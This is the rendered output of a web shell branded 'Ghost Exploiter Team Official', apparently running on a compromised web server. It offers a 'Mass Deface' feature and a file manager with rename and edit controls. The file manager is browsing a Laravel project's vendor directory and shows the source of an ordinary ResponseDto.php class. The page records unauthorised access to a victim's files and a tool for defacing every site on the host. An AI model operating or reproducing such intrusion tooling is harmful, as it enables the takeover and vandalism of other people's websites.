Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
markbaker
/
matrix
/
.github
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
workflows
--
ren
ClockInterface.php
0KB
edt
ren
ResponseDto.php
1.147KB
edt
ren
api.php
0KB
edt
ren
auth.php
0KB
edt
ren
console.php
0KB
edt
ren
debugbar.php
13.946KB
edt
ren
default.conf
0.759KB
edt
ren
testOperations.php
0.587KB
edt
ren
<?php declare(strict_types=1); namespace App\Responses; use Spatie\LaravelData\Data; class ResponseDto extends Data { public function __construct( public string|null $message = null, public array|null $errors = null, public object|array|null $data = null, public ?bool $status = null, /** @var PaginationDto */ public ?array $pagination = null, public ?bool $paginatable = false, ) { if ($this->status === null) { $this->status = true; } if ($this->paginatable && blank($this->pagination)) { $this->pagination = Dto::dataExample(PaginationDto::class); } if (!$this->paginatable) { unset($this->pagination); } unset($this->paginatable); } public static function example(): array { return [ 'data' => [ 'status' => true, 'message' => null, 'errors' => null, 'data' => [], 'pagination' => null, ], 'status' => true, ]; } }